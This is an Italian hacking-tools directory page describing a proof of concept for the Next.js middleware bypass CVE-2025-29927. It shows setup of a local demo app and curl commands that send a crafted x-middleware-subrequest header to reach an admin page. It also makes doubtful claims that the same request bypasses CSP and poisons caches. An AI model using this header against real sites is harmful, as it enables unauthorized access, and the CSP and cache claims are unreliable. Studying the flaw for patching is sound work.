Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 Prova di concetto | Kitploit
Strumenti/GitHubGitHub/eve-satoru/poc-cve-2025-29927
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebBypass WAFSicurezza Web
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 Prova di concetto

Vedi Repository
311 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-29927: PoC del Bypass del Middleware Next.js

Panoramica

Questo PoC dimostra CVE-2025-29927, una vulnerabilità nel middleware Next.js che consente agli attaccanti di bypassare i meccanismi di autenticazione, autorizzazione e CSP utilizzando l'header x-middleware-subrequest.

Versioni interessate

Versioni di Next.js dalla 11.1.4 alla 15.1.7

Setup e installazione

1️⃣ Clona e installa il PoC

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

L'applicazione si avvierà su http://localhost:3000

Scenari di sfruttamento

1️⃣ Bypass di autenticazione e autorizzazione (cURL)

1- Usa x-middleware-subrequest per ottenere accesso non autorizzato:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 Risultato atteso: la risposta restituisce admin admin, anche se l'autenticazione è stata bypassata.

result screenshot

2️⃣ Bypass della CSP per iniezione XSS

Se la CSP è applicata tramite middleware, bypassala:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 Risultato atteso: la CSP viene ignorata, consentendo l'esecuzione di script dannosi.

3️⃣ Attacco DoS da cache poisoning (CPDoS)

Sfrutta il cache poisoning forzando una risposta malformata:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 Risultato atteso: la pagina viene memorizzata nella cache con contenuti errati, disturbando gli utenti normali.

Strategie di mitigazione

  • ✅ Valida la logica del middleware per prevenire il bypass .
  • ✅ Aggiorna Next.js quando viene rilasciata una versione patchata .
Scarica lo strumento